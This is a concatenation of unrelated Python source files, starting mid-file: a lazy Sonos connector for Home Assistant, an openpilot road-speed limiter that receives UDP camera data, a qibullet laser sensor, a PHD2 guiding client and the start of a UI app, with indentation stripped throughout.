self._lazyuid = None
self._inited = False
self._lazyZoneName = helper.get_zonename(ip)
self._ip = ip
super().__init__(ip)
helper.registerSoCo(self)
async def _initialize(self, loop=None):
connection = asyncio.open_connection(host=self._ip, port=1400, loop=loop)
try:
reader, writer = await asyncio.wait_for(connection, 3, loop=loop)
writer.close()
self._inited = True
except (asyncio.TimeoutError, OSError) as e:
return
def is_lazy_connected(self):
return self._inited
@property
def uid(self):
if self._lazyuid is None:
self._lazyuid = "lazy" + self.ip_address
return self._lazyuid
def get_speaker_info(self, refresh=False, timeout=None):
if self._inited:
return super().get_speaker_info(refresh=refresh, timeout=timeout)
info = dict()
info['zone_name'] = self._lazyZoneName
info['model_name'] = "Sonos Lazy Connector"
return info
@property
def shuffle(self):
if self._inited:
return super().shuffle
return False
@shuffle.setter
def shuffle(self, shuffle):
SoCo.shuffle.fset(self, shuffle)
@property
def volume(self):
if self._inited:
return super().volume
return 0
@volume.setter
def volume(self, volume):
SoCo.volume.fset(self, volume)
@property
def mute(self):
if self._inited:
return super().mute
return True
@mute.setter
def mute(self, mute):
SoCo.mute.fset(self, mute)
@property
def night_mode(self):
if self._inited:
return super().night_mode
return None
@property
def dialog_mode(self):
if self._inited:
return super().dialog_mode
return None
@property
def music_library(self):
if self._inited:
return self._music_library
return EmptyMusicLibrary()
@music_library.setter
def music_library(self, music_library):
self._music_library = music_library
music_library.contentDirectory = self._contentDirectory
@property
def avTransport(self):
if self._inited:
return self._avTransport
return LazyService()
@avTransport.setter
def avTransport(self, avTransport):
self._avTransport = avTransport
@property
def renderingControl(self):
if self._inited:
return self._renderingControl
return LazyService()
@renderingControl.setter
def renderingControl(self, renderingControl):
self._renderingControl = renderingControl
    # This must not be ignored; if it were, it would have to be wrapped very cleanly.
@property
def zoneGroupTopology(self):
if self._inited:
return self._zoneGroupTopology
return LazyZoneGroupTopology()
@zoneGroupTopology.setter
def zoneGroupTopology(self, zoneGroupTopology):
self._zoneGroupTopology = zoneGroupTopology
@property
def contentDirectory(self):
if self._inited:
return self._contentDirectory
return LazyService()
@contentDirectory.setter
def contentDirectory(self, contentDirectory):
self._contentDirectory = contentDirectory
@property
def group(self):
if self._inited:
return super().group
return None
pysonos.SoCo = LazySoCo
pysonos.config.SOCO_CLASS=LazySoCo
def static_discover_thread(callback,
timeout,
include_invisible,
interface_addr):
global helper
helper.discover(callback)
pysonosdiscover._discover_thread = static_discover_thread
class LazySonosEntity(sonosha.SonosEntity):
def __init__(self, player):
super().__init__(player)
self._available = False
pass
def seen(self):
if not self._player.is_lazy_connected():
self._seen = 0
return
super().seen()
sonosha.SonosEntity = LazySonosEntity
async def async_setup_platform(hass,
config,
async_add_entities,
discovery_info=None):
"""Set up the Sonos platform.
"""
try:
for host in config['hosts']:
helper.register_zonename(host['name'], host['ip'])
LazySoCo(host['ip'])
except Exception as e:
print(traceback.format_exc())
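# Hedged example: a sketch of the static host configuration that
# async_setup_platform() above expects -- a list of entries with "name" and
# "ip". The platform key and the concrete values are assumptions for
# illustration.
#
# media_player:
#   - platform: sonos_static
#     hosts:
#       - name: Living Room
#         ip: 192.168.1.50
#       - name: Kitchen
#         ip: 192.168.1.51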
|
road_speed_limiter.py
|
import json
import threading
import time
import socket
import fcntl
import struct
from threading import Thread
from cereal import messaging
from common.params import Params
from common.numpy_fast import interp
current_milli_time = lambda: int(round(time.time() * 1000))
CAMERA_SPEED_FACTOR = 1.05
BROADCAST_PORT = 2899
RECEIVE_PORT = 843
LOCATION_PORT = 2911
class RoadSpeedLimiter:
def __init__(self):
self.json_road_limit = None
self.active = 0
self.last_updated = 0
self.last_updated_active = 0
self.slowing_down = False
self.last_exception = None
self.lock = threading.Lock()
self.remote_addr = None
self.start_dist = 0
self.longcontrol = Params().get_bool('LongControlEnabled')
thread = Thread(target=self.udp_recv_thread, args=[])
thread.setDaemon(True)
thread.start()
broadcast = Thread(target=self.broadcast_thread, args=[])
broadcast.setDaemon(True)
broadcast.start()
#gps = Thread(target=self.gps_thread, args=[])
#gps.setDaemon(True)
#gps.start()
def gps_thread(self):
sm = messaging.SubMaster(['gpsLocationExternal'], poll=['gpsLocationExternal'])
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
while True:
try:
sm.update()
if self.remote_addr is not None and sm.updated['gpsLocationExternal']:
location = sm['gpsLocationExternal']
json_location = json.dumps([
location.latitude,
location.longitude,
location.altitude,
location.speed,
location.bearingDeg,
location.accuracy,
location.timestamp,
location.source,
location.vNED,
location.verticalAccuracy,
location.bearingAccuracyDeg,
location.speedAccuracy,
])
address = (self.remote_addr[0], LOCATION_PORT)
sock.sendto(json_location.encode(), address)
else:
time.sleep(1.)
except Exception as e:
print("exception", e)
time.sleep(1.)
def get_broadcast_address(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ip = fcntl.ioctl(
s.fileno(),
0x8919,
struct.pack('256s', 'wlan0'.encode('utf-8'))
)[20:24]
return socket.inet_ntoa(ip)
except:
return None
def broadcast_thread(self):
broadcast_address = None
frame = 0
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
while True:
try:
if broadcast_address is None or frame % 10 == 0:
broadcast_address = self.get_broadcast_address()
print('broadcast_address', broadcast_address)
if broadcast_address is not None:
address = (broadcast_address, BROADCAST_PORT)
sock.sendto('EON:ROAD_LIMIT_SERVICE:v1'.encode(), address)
except:
pass
time.sleep(5.)
frame += 1
if current_milli_time() - self.last_updated_active > 1000*10:
self.active = 0
except:
pass
def udp_recv_thread(self):
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
try:
sock.bind(('0.0.0.0', RECEIVE_PORT))
while True:
try:
data, self.remote_addr = sock.recvfrom(2048)
json_obj = json.loads(data.decode())
try:
self.lock.acquire()
try:
if 'active' in json_obj:
self.active = json_obj['active']
self.last_updated_active = current_milli_time()
except:
pass
if 'road_limit' in json_obj:
self.json_road_limit = json_obj['road_limit']
self.last_updated = current_milli_time()
finally:
self.lock.release()
except:
try:
self.lock.acquire()
self.json_road_limit = None
finally:
self.lock.release()
except Exception as e:
self.last_exception = e
def get_limit_val(self, key, default=None):
if self.json_road_limit is None:
return default
if key in self.json_road_limit:
return self.json_road_limit[key]
return default
def get_active(self):
if self.active is None:
return 0
return self.active
def get_max_speed(self, CS, v_cruise_kph):
log = ""
if current_milli_time() - self.last_updated > 1000 * 20:
if self.last_exception is not None:
log = str(self.last_exception)
else:
log = "expired: {:d}, {:d}".format(current_milli_time(), self.last_updated)
self.slowing_down = False
return 0, 0, 0, False, log
try:
road_limit_speed = self.get_limit_val('road_limit_speed')
is_highway = self.get_limit_val('is_highway')
cam_type = int(self.get_limit_val('cam_type', 0))
cam_limit_speed_left_dist = self.get_limit_val('cam_limit_speed_left_dist')
cam_limit_speed = self.get_limit_val('cam_limit_speed')
section_limit_speed = self.get_limit_val('section_limit_speed')
# section_avg_speed = self.get_val('section_avg_speed')
section_left_dist = self.get_limit_val('section_left_dist')
# section_left_time = self.get_val('section_left_time')
if is_highway is not None:
if is_highway:
MIN_LIMIT = 40
MAX_LIMIT = 120
else:
MIN_LIMIT = 30
MAX_LIMIT = 100
else:
MIN_LIMIT = 30
MAX_LIMIT = 120
# log = "RECV: " + str(is_highway)
# log += ", " + str(cam_limit_speed)
# log += ", " + str(cam_limit_speed_left_dist)
# log += ", " + str(section_limit_speed)
# log += ", " + str(section_left_dist)
v_ego = CS.clu11["CF_Clu_Vanz"] / 3.6
if cam_limit_speed_left_dist is not None and cam_limit_speed is not None and cam_limit_speed_left_dist > 0:
diff_speed = v_ego * 3.6 - cam_limit_speed
if cam_type == 7:
if self.longcontrol:
sec = interp(diff_speed, [10., 30.], [15., 22.])
else:
sec = interp(diff_speed, [10., 30.], [16., 23.])
else:
if self.longcontrol:
sec = interp(diff_speed, [10., 30.], [12., 18.])
else:
sec = interp(diff_speed, [10., 30.], [13., 20.])
if MIN_LIMIT <= cam_limit_speed <= MAX_LIMIT and (self.slowing_down or cam_limit_speed_left_dist < v_ego * sec):
if not self.slowing_down:
self.start_dist = cam_limit_speed_left_dist * 1.2
self.slowing_down = True
first_started = True
else:
first_started = False
base = self.start_dist / 1.2 * 0.65
td = self.start_dist - base
d = cam_limit_speed_left_dist - base
if d > 0 and td > 0. and diff_speed > 0 and (section_left_dist is None or section_left_dist < 10):
pp = d / td
else:
pp = 0
return cam_limit_speed * CAMERA_SPEED_FACTOR + int(
pp * diff_speed), cam_limit_speed, cam_limit_speed_left_dist, first_started, log
self.slowing_down = False
return 0, cam_limit_speed, cam_limit_speed_left_dist, False, log
elif section_left_dist is not None and section_limit_speed is not None and section_left_dist > 0:
if MIN_LIMIT <= section_limit_speed <= MAX_LIMIT:
if not self.slowing_down:
self.slowing_down = True
first_started = True
else:
first_started = False
return section_limit_speed, section_limit_speed, section_left_dist, first_started, log
self.slowing_down = False
return 0, section_limit_speed, section_left_dist, False, log
except Exception as e:
log = "Ex: " + str(e)
pass
self.slowing_down = False
return 0, 0, 0, False, log
road_speed_limiter = None
def road_speed_limiter_get_active():
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter.get_active()
def road_speed_limiter_get_max_speed(CS, v_cruise_kph):
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
try:
road_speed_limiter.lock.acquire()
return road_speed_limiter.get_max_speed(CS, v_cruise_kph)
finally:
road_speed_limiter.lock.release()
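# Hedged usage sketch: get_max_speed() returns a 5-tuple which, from the code
# above, can be read as (target_speed_kph, limit_speed_kph, left_dist_m,
# first_started, log), where a target of 0 means "no active limit". "CS" below
# stands for the car-state object used elsewhere in the surrounding codebase
# and is an assumption here.
#
#   max_speed, limit_speed, left_dist, first_started, log = \
#       road_speed_limiter_get_max_speed(CS, v_cruise_kph)
#   if max_speed > 0:
#       v_cruise_kph = min(v_cruise_kph, max_speed)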
|
laser.py
|
#!/usr/bin/env python
# coding: utf-8
import time
import math
import pybullet
import threading
from qibullet.sensor import Sensor
RAY_MISS_COLOR = [0, 1, 0]
RAY_HIT_COLOR = [1, 0, 0]
NUM_RAY = 15
RAY_LENGTH = 3.0 # The theoretical length is 5.6, closer to 3.0 in reality
LASER_ANGLE = 60
LASER_POSITION = [
[0.0562, 0, -0.334], # Front laser
[-0.018, -0.0899, -0.334], # Right laser
[-0.018, 0.0899, -0.334] # Left laser
]
ANGLE_LIST_POSITION = [
math.radians(LASER_ANGLE / 2), # Front laser
math.radians(LASER_ANGLE / 2) - 1.75728, # Right laser
math.radians(LASER_ANGLE / 2) + 1.75728 # Left laser
]
NUM_LASER = len(LASER_POSITION)
DEFAULT_FREQUENCY = 6.25
class Laser(Sensor):
"""
Class representing a virtual laser
"""
def __init__(
self,
robot_model,
laser_id,
frequency=DEFAULT_FREQUENCY,
display=False,
physicsClientId=0):
"""
Constructor
Parameters:
robot_model - The pybullet model of the robot.
laser_id - The id of the link (Link type)
onto which the Lasers' are attached.
frequency - The update frequency of the laser in Hz (default
frequency set to 6.25 Hz)
display - boolean that allow the display of the laser
physicsClientId - The id of the simulated instance in which the
lasers are to be spawned
"""
Sensor.__init__(self, robot_model, physicsClientId)
self.ray_from = []
self.ray_to = []
self.ray_ids = []
self.laser_value = [0] * NUM_RAY * NUM_LASER
self.laser_id = laser_id
self.display = display
self.values_lock = threading.Lock()
self.setFrequency(frequency)
def subscribe(self):
"""
Subscribe to the laser scan (this will activate the laser scan
process).
"""
# No need to subscribe to the laser scan if the lasers are activated
if self.isAlive():
return
self._module_termination = False
self._initializeRays()
self.module_process = threading.Thread(target=self._laserScan)
self.module_process.start()
def unsubscribe(self):
"""
Unsubscribe from the laser scan (this will deactivate the laser scan
process)
"""
if self.isAlive():
self._terminateModule()
def showLaser(self, display):
"""
Display debug lines that simulate the laser
"""
self.display = display
def getFrontLaserValue(self):
"""
Return a list of the front laser value (clockwise)
"""
with self.values_lock:
return self.laser_value[:NUM_RAY]
def getRightLaserValue(self):
"""
Return a list of the right laser value (clockwise)
"""
with self.values_lock:
return self.laser_value[NUM_RAY:2*NUM_RAY]
def getLeftLaserValue(self):
"""
Return a list of the left laser value (clockwise)
"""
with self.values_lock:
return self.laser_value[2*NUM_RAY:]
def _initializeRays(self):
"""
INTERNAL METHOD, initialize the laser and all variables needed
"""
for index in range(NUM_LASER):
angle = ANGLE_LIST_POSITION[index]
for i in range(NUM_RAY):
self.ray_from.append([
LASER_POSITION[index][0],
LASER_POSITION[index][1],
LASER_POSITION[index][2]])
self.ray_to.append([
LASER_POSITION[index][0] + (RAY_LENGTH) * math.cos(
float(i) * math.radians(-LASER_ANGLE)/NUM_RAY + angle),
LASER_POSITION[index][1] + (RAY_LENGTH) * math.sin(
float(i) * math.radians(-LASER_ANGLE)/NUM_RAY + angle),
LASER_POSITION[index][2]])
def _laserScan(self):
"""
INTERNAL METHOD, a loop that simulate the laser and update the distance
value of each laser
"""
period = 1.0 / self.getFrequency()
sampling_time = time.time()
while not self._module_termination:
current_time = time.time()
if current_time - sampling_time < period:
continue
results = pybullet.rayTestBatch(
self.ray_from,
self.ray_to,
parentObjectUniqueId=self.getRobotModel(),
parentLinkIndex=self.laser_id,
physicsClientId=self.getPhysicsClientId())
with self.values_lock:
for i in range(NUM_RAY*len(ANGLE_LIST_POSITION)):
hitObjectUid = results[i][0]
hitFraction = results[i][2]
hitPosition = results[i][3]
self.laser_value[i] = hitFraction * RAY_LENGTH
if self.display:
if not self.ray_ids:
self._createDebugLine()
if (hitFraction == 1.):
pybullet.addUserDebugLine(
self.ray_from[i],
self.ray_to[i],
RAY_MISS_COLOR,
replaceItemUniqueId=self.ray_ids[i],
parentObjectUniqueId=self.getRobotModel(),
parentLinkIndex=self.laser_id,
physicsClientId=self.getPhysicsClientId())
else: # pragma: no cover
localHitTo = [
self.ray_from[i][0] + hitFraction * (
self.ray_to[i][0] - self.ray_from[i][0]),
self.ray_from[i][1] + hitFraction * (
self.ray_to[i][1] - self.ray_from[i][1]),
self.ray_from[i][2] + hitFraction * (
self.ray_to[i][2] - self.ray_from[i][2])]
pybullet.addUserDebugLine(
self.ray_from[i],
localHitTo,
RAY_HIT_COLOR,
replaceItemUniqueId=self.ray_ids[i],
parentObjectUniqueId=self.getRobotModel(),
parentLinkIndex=self.laser_id,
physicsClientId=self.getPhysicsClientId())
else:
if self.ray_ids:
self._resetDebugLine()
sampling_time = current_time
def _createDebugLine(self):
"""
INTERNAL METHOD, create all debug lines needed for simulating the
lasers
"""
for i in range(NUM_RAY * NUM_LASER):
self.ray_ids.append(pybullet.addUserDebugLine(
self.ray_from[i],
self.ray_to[i],
RAY_MISS_COLOR,
parentObjectUniqueId=self.getRobotModel(),
parentLinkIndex=self.laser_id,
physicsClientId=self.getPhysicsClientId()))
def _resetDebugLine(self):
"""
INTERNAL METHOD, remove all debug lines
"""
for i in range(len(self.ray_ids)):
pybullet.removeUserDebugItem(
self.ray_ids[i],
physicsClientId=self.getPhysicsClientId())
self.ray_ids = []
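# Hedged usage sketch: a minimal illustration of the Laser API defined above.
# robot_model and laser_id are assumed to come from the surrounding qibullet
# simulation setup.
def read_front_laser_once(robot_model, laser_id):
    laser = Laser(robot_model, laser_id, frequency=DEFAULT_FREQUENCY)
    laser.subscribe()                     # starts the background scan thread
    time.sleep(2.0 / DEFAULT_FREQUENCY)   # allow at least one scan to complete
    values = laser.getFrontLaserValue()   # NUM_RAY distances, clockwise
    laser.unsubscribe()
    return values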
|
phd2guider.py
|
# MIT License
# Copyright (c) 2017 Andy Galasso
# https://github.com/agalasso/phd2client/
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
PHD2 guiding module
"""
import copy
import json
import math
import selectors
import socket
import threading
import time
class SettleProgress:
"""Info related to progress of settling after guiding starts or after
a dither
"""
def __init__(self):
self.Done = False
self.Distance = 0.0
self.SettlePx = 0.0
self.Time = 0.0
self.SettleTime = 0.0
self.Status = 0
self.Error = ""
class GuideStats:
"""cumulative guide stats since guiding started and settling
completed
"""
def __init__(self):
self.rms_tot = 0.0
self.rms_ra = 0.0
self.rms_dec = 0.0
self.peak_ra = 0.0
self.peak_dec = 0.0
class GuiderException(Exception):
"""GuiderException is the base class for any excettions raied by the
Guider methods
"""
pass
class _Accum:
def __init__(self):
self.Reset()
def Reset(self):
self.n = 0
self.a = self.q = self.peak = 0
def Add(self, x):
ax = abs(x)
if ax > self.peak:
self.peak = ax
self.n += 1
d = x - self.a
self.a += d / self.n
self.q += (x - self.a) * d
def Mean(self):
return self.a
def Stdev(self):
return math.sqrt(self.q / self.n) if self.n >= 1 else 0.0
def Peak(self):
return self.peak
class _Conn:
def __init__(self):
self.lines = []
self.buf = b""
self.sock = None
self.sel = None
self.terminate = False
def __del__(self):
self.Disconnect()
def Connect(self, hostname, port):
self.sock = socket.socket()
try:
self.sock.connect((hostname, port))
self.sock.setblocking(False) # non-blocking
self.sel = selectors.DefaultSelector()
self.sel.register(self.sock, selectors.EVENT_READ)
except Exception:
self.sel = None
self.sock = None
raise
def Disconnect(self):
if self.sel is not None:
self.sel.unregister(self.sock)
self.sel = None
if self.sock is not None:
self.sock.close()
self.sock = None
def IsConnected(self):
return self.sock is not None
def ReadLine(self):
# print(f"DBG: ReadLine enter lines:{len(self.lines)}")
while not self.lines:
# print("DBG: begin wait")
while True:
if self.terminate:
return ""
events = self.sel.select(0.5)
if events:
break
# print("DBG: call recv")
s = self.sock.recv(4096)
# print(f"DBG: recvd: {len(s)}: {s}")
i0 = 0
i = i0
while i < len(s):
if s[i] == b"\r"[0] or s[i] == b"\n"[0]:
self.buf += s[i0:i]
if self.buf:
self.lines.append(self.buf)
self.buf = b""
i += 1
i0 = i
else:
i += 1
self.buf += s[i0:i]
return self.lines.pop(0)
def WriteLine(self, s):
b = s.encode()
totsent = 0
while totsent < len(b):
sent = self.sock.send(b[totsent:])
if sent == 0:
raise RuntimeError("socket connection broken")
totsent += sent
def Terminate(self):
self.terminate = True
class Guider:
"""The main class for interacting with PHD2"""
DEFAULT_STOPCAPTURE_TIMEOUT = 10
def __init__(self, hostname="localhost", instance=1):
self.hostname = hostname
self.instance = instance
self.conn = None
self.terminate = False
self.worker = None
self.lock = threading.Lock()
self.cond = threading.Condition()
self.response = None
self.AppState = ""
self.AvgDist = 0
self.Version = ""
self.PHDSubver = ""
self.accum_active = False
self.settle_px = 0
self.accum_ra = _Accum()
self.accum_dec = _Accum()
self.Stats = GuideStats()
self.Settle = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.Disconnect()
@staticmethod
def _is_guiding(st):
return st == "Guiding" or st == "LostLock"
@staticmethod
def _accum_get_stats(ra, dec):
stats = GuideStats()
stats.rms_ra = ra.Stdev()
stats.rms_dec = dec.Stdev()
stats.peak_ra = ra.Peak()
stats.peak_dec = dec.Peak()
return stats
def _handle_event(self, ev):
e = ev["Event"]
if e == "AppState":
with self.lock:
self.AppState = ev["State"]
if self._is_guiding(self.AppState):
self.AvgDist = 0 # until we get a GuideStep event
elif e == "Version":
with self.lock:
self.Version = ev["PHDVersion"]
self.PHDSubver = ev["PHDSubver"]
elif e == "StartGuiding":
self.accum_active = True
self.accum_ra.Reset()
self.accum_dec.Reset()
stats = self._accum_get_stats(self.accum_ra, self.accum_dec)
with self.lock:
self.Stats = stats
elif e == "GuideStep":
if self.accum_active:
self.accum_ra.Add(ev["RADistanceRaw"])
self.accum_dec.Add(ev["DECDistanceRaw"])
stats = self._accum_get_stats(self.accum_ra, self.accum_dec)
with self.lock:
self.AppState = "Guiding"
self.AvgDist = ev["AvgDist"]
if self.accum_active:
self.Stats = stats
elif e == "SettleBegin":
self.accum_active = (
False # exclude GuideStep messages from stats while settling
)
elif e == "Settling":
s = SettleProgress()
s.Done = False
s.Distance = ev["Distance"]
s.SettlePx = self.settle_px
s.Time = ev["Time"]
s.SettleTime = ev["SettleTime"]
s.Status = 0
with self.lock:
self.Settle = s
elif e == "SettleDone":
self.accum_active = True
self.accum_ra.Reset()
self.accum_dec.Reset()
stats = self._accum_get_stats(self.accum_ra, self.accum_dec)
s = SettleProgress()
s.Done = True
s.Status = ev["Status"]
s.Error = ev.get("Error")
with self.lock:
self.Settle = s
self.Stats = stats
elif e == "Paused":
with self.lock:
self.AppState = "Paused"
elif e == "StartCalibration":
with self.lock:
self.AppState = "Calibrating"
elif e == "LoopingExposures":
with self.lock:
self.AppState = "Looping"
elif e == "LoopingExposuresStopped" or e == "GuidingStopped":
with self.lock:
self.AppState = "Stopped"
elif e == "StarLost":
with self.lock:
self.AppState = "LostLock"
self.AvgDist = ev["AvgDist"]
else:
# print(f"DBG: todo: handle event {e}")
pass
def _worker(self):
while not self.terminate:
line = self.conn.ReadLine()
# print(f"DBG: L: {line}")
if not line:
if not self.terminate:
# server disconnected
# print("DBG: server disconnected")
pass
break
try:
j = json.loads(line)
except json.JSONDecodeError:
# ignore invalid json
# print("DBG: ignoring invalid json response")
continue
if "jsonrpc" in j:
# a response
# print(f"DBG: R: {line}\n")
with self.cond:
self.response = j
self.cond.notify()
else:
self._handle_event(j)
def Connect(self):
"""connect to PHD2 -- call Connect before calling any of the server API methods below"""
self.Disconnect()
try:
self.conn = _Conn()
self.conn.Connect(self.hostname, 4400 + self.instance - 1)
self.terminate = False
self.worker = threading.Thread(target=self._worker)
self.worker.start()
# print("DBG: connect done")
except Exception:
self.Disconnect()
raise
def Disconnect(self):
"""disconnect from PHD2"""
if self.worker is not None:
if self.worker.is_alive():
# print("DBG: terminating worker")
self.terminate = True
self.conn.Terminate()
# print("DBG: joining worker")
self.worker.join()
self.worker = None
if self.conn is not None:
self.conn.Disconnect()
self.conn = None
# print("DBG: disconnect done")
@staticmethod
def _make_jsonrpc(method, params):
req = {"method": method, "id": 1}
if params is not None:
if isinstance(params, (list, dict)):
req["params"] = params
else:
# single non-null parameter
req["params"] = [params]
return json.dumps(req, separators=(",", ":"))
@staticmethod
def _failed(res):
return "error" in res
def Call(self, method, params=None):
"""this function can be used for raw JSONRPC method
invocation. Generally you won't need to use this as it is much
more convenient to use the higher-level methods below
"""
s = self._make_jsonrpc(method, params)
# print(f"DBG: Call: {s}")
# send request
self.conn.WriteLine(s + "\r\n")
# wait for response
with self.cond:
while not self.response:
self.cond.wait()
response = self.response
self.response = None
if self._failed(response):
raise GuiderException(response["error"]["message"])
return response
def _CheckConnected(self):
if not self.conn.IsConnected():
raise GuiderException("PHD2 Server disconnected")
def Guide(self, settlePixels, settleTime, settleTimeout):
"""Start guiding with the given settling parameters. PHD2 takes care
of looping exposures, guide star selection, and settling. Call
CheckSettling() periodically to see when settling is complete.
"""
self._CheckConnected()
s = SettleProgress()
s.Done = False
s.Distance = 0
s.SettlePx = settlePixels
s.Time = 0
s.SettleTime = settleTime
s.Status = 0
with self.lock:
if self.Settle and not self.Settle.Done:
raise GuiderException("cannot guide while settling")
self.Settle = s
try:
self.Call(
"guide",
[
{
"pixels": settlePixels,
"time": settleTime,
"timeout": settleTimeout,
},
False, # don't force calibration
],
)
self.settle_px = settlePixels
except Exception:
with self.lock:
self.Settle = None
raise
def Dither(self, ditherPixels, settlePixels, settleTime, settleTimeout):
"""Dither guiding with the given dither amount and settling parameters. Call CheckSettling()
periodically to see when settling is complete.
"""
self._CheckConnected()
s = SettleProgress()
s.Done = False
s.Distance = ditherPixels
s.SettlePx = settlePixels
s.Time = 0
s.SettleTime = settleTime
s.Status = 0
with self.lock:
if self.Settle and not self.Settle.Done:
raise GuiderException("cannot dither while settling")
self.Settle = s
try:
self.Call(
"dither",
[
ditherPixels,
False,
{
"pixels": settlePixels,
"time": settleTime,
"timeout": settleTimeout,
},
],
)
self.settle_px = settlePixels
except Exception:
with self.lock:
self.Settle = None
raise
def IsSettling(self):
"""Check if phd2 is currently in the process of settling after a Guide
or Dither"""
self._CheckConnected()
with self.lock:
if self.Settle:
return True
# for app init, initialize the settle state to a consistent
# value as if Guide had been called
res = self.Call("get_settling")
val = res["result"]
if val:
s = SettleProgress()
s.Done = False
s.Distance = -1.0
s.SettlePx = 0.0
s.Time = 0.0
s.SettleTime = 0.0
s.Status = 0
with self.lock:
if self.Settle is None:
self.Settle = s
return val
def CheckSettling(self):
"""Get the progress of settling"""
self._CheckConnected()
ret = SettleProgress()
with self.lock:
if not self.Settle:
raise GuiderException("not settling")
if self.Settle.Done:
# settle is done
ret.Done = True
ret.Status = self.Settle.Status
ret.Error = self.Settle.Error
self.Settle = None
else:
# settle in progress
ret.Done = False
ret.Distance = self.Settle.Distance
ret.SettlePx = self.settle_px
ret.Time = self.Settle.Time
ret.SettleTime = self.Settle.SettleTime
return ret
def GetStats(self):
"""Get the guider statistics since guiding started. Frames captured
while settling is in progress are excluded from the stats.
"""
self._CheckConnected()
with self.lock:
stats = copy.copy(self.Stats)
stats.rms_tot = math.hypot(stats.rms_ra, stats.rms_dec)
return stats
def StopCapture(self, timeoutSeconds=10):
"""stop looping and guiding"""
self.Call("stop_capture")
for i in range(0, timeoutSeconds):
with self.lock:
if self.AppState == "Stopped":
return
time.sleep(1)
self._CheckConnected()
# hack! workaround bug where PHD2 sends a GuideStep after stop
# request and fails to send GuidingStopped
res = self.Call("get_app_state")
st = res["result"]
with self.lock:
self.AppState = st
if st == "Stopped":
return
# end workaround
raise GuiderException(
f"guider did not stop capture after {timeoutSeconds} seconds!"
)
def Loop(self, timeoutSeconds=10):
"""start looping exposures"""
self._CheckConnected()
# already looping?
with self.lock:
if self.AppState == "Looping":
return
res = self.Call("get_exposure")
exp = res["result"]
self.Call("loop")
time.sleep(exp)
for i in range(0, timeoutSeconds):
with self.lock:
if self.AppState == "Looping":
return
time.sleep(1)
self._CheckConnected()
raise GuiderException("timed-out waiting for guiding to start looping")
def PixelScale(self):
"""get the guider pixel scale in arc-seconds per pixel"""
res = self.Call("get_pixel_scale")
return res["result"]
def GetEquipmentProfiles(self):
"""get a list of the Equipment Profile names"""
res = self.Call("get_profiles")
profiles = []
for p in res["result"]:
profiles.append(p["name"])
return profiles
def ConnectEquipment(self, profileName):
"""connect the equipment in an equipment profile"""
res = self.Call("get_profile")
prof = res["result"]
if prof["name"] != profileName:
res = self.Call("get_profiles")
profiles = res["result"]
profid = -1
for p in profiles:
name = p["name"]
if name == profileName:
profid = p.get("id", -1)
break
if profid == -1:
raise GuiderException(f"invalid phd2 profile name: {profileName}")
self.StopCapture(self.DEFAULT_STOPCAPTURE_TIMEOUT)
self.Call("set_connected", False)
self.Call("set_profile", profid)
self.Call("set_connected", True)
def DisconnectEquipment(self):
"""disconnect equipment"""
self.StopCapture(self.DEFAULT_STOPCAPTURE_TIMEOUT)
self.Call("set_connected", False)
def GetStatus(self):
"""get the AppState
(https://github.com/OpenPHDGuiding/phd2/wiki/EventMonitoring#appstate)
and current guide error
"""
self._CheckConnected()
with self.lock:
return self.AppState, self.AvgDist
def IsGuiding(self):
"""check if currently guiding"""
st, dist = self.GetStatus()
return self._is_guiding(st)
def Pause(self):
"""pause guiding (looping exposures continues)"""
self.Call("set_paused", True)
def Unpause(self):
"""un-pause guiding"""
self.Call("set_paused", False)
def SaveImage(self, filename):
"""save the current guide camera frame (FITS format), returning the
name of the file in *filename. The caller will need to remove
the file when done.
"""
res = self.Call("save_image")
return res["result"]["filename"]
|
main_ui.py
|
import logging, sys, signal, time, json, os, pytweening, threading
from collections import deque
from lib.vhWindows import vhWindows
from lib.vhSockets import vhSockets
from lib.vhUI import vhUI
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
#logger = logging.getLogger(__name__)
#logger.setLevel(logging.DEBUG)
class App:
colorBuffer = bytes([0])
# This moves
cacheHP = 0
conf = vhWindows()
sock = vhSockets()
ui = vhUI()
# Last loop tick
tickTime = time.time()
# Tween value being modified
tweenVal = 0
# Tween start value
tweenStart = 0
# Time tween was started
tweenStarted = 0
# Local duration in case we go over max
tweenDuration = 1
TWEEN_DURATION = 1
FRAMERATE = 4
# Time to run a save
saveScheduled = 0
def __init__(self):
signal.signal(signal.SIGINT, self.sigint_handler)
self.conf.onWowStatus = self.onWowRunning
self.conf.init()
self.ui.setDeviceId(self.conf.deviceID)
self.ui.setDeviceServer(self.conf.server)
self.ui.setIntensity(self.conf.maxIntensity)
self.ui.setRatio(self.conf.hpRatio)
self.ui.setMinIntensity(self.conf.minIntensity)
self.ui.setCursorCoordinates(self.conf.cursor["x"], self.conf.cursor["y"])
self.ui.onEvt = self.uiEvent
self.sock.onConnection = self.onConnection
self.sock.init(self.conf)
thrd = threading.Thread(target=self.loop)
thrd.daemon = True
thrd.start()
#start UI
self.ui.begin()
def uiEvent(self, t, data):
c = self.conf
if t == "settings":
c.deviceID = data[0]
c.server = data[1]
c.saveConfig()
self.sock.resetDevice()
